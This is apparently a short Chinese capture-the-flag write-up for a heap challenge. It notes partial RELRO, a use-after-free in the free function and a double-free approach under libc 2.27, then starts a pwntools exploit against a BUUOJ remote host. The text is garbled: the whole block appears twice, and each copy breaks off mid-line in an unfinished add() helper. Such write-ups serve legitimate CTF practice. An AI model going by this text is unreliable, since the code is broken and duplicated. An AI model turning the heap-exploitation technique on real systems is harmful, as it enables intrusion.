RELRO半开
就是个菜单堆。
free
free函数有uaf。
2.27的libc直接double free就好了。
exp
from pwn import *
r = remote("node4.buuoj.cn", 26014)
def add(size,cont):
r.sendlineafter(">>", '1')
r.sendlineafter('Size', str(size)
RELRO半开
就是个菜单堆。
free
free函数有uaf。
2.27的libc直接double free就好了。
exp
from pwn import *
r = remote("node4.buuoj.cn", 26014)
def add(size,cont):
r.sendlineafter(">>", '1')
r.sendlineafter('Size', str(size)